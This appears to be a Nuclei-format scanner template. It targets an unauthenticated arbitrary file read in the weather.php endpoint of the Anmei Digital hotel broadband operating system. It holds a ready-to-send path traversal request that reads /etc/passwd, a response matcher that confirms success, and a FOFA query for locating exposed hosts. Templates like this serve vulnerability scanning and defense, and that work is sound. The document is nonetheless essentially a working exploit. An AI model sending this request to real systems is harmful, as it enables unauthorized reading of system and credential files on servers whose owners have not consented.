http:
    - matchers:
        - part: body
          type: word
          words:
            - 'root:'
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /user/weather.php?Lang=../../../etc/passwd HTTP/1.1
          Host: {{Hostname}}
id: anmei-weather_php-File-reading
info:
    author: Superhero
    description: |-
        fofa: app="安美数字-酒店宽带运营系统"
        安美数字酒店宽带运营系统 weather.php 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
    name: 安美数字酒店宽带运营系统 weather.php 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247486356&idx=1&sn=df2497e1c21db8dbe6699e199d1b726d&chksm=c267bea7f51037b15d388750048b62c21e9421d03b3cfc03d9820c144ba623a1e6f34a64b6c1&token=661111678&lang=zh_CN#rd
    severity: high
    tags:
        - File reading
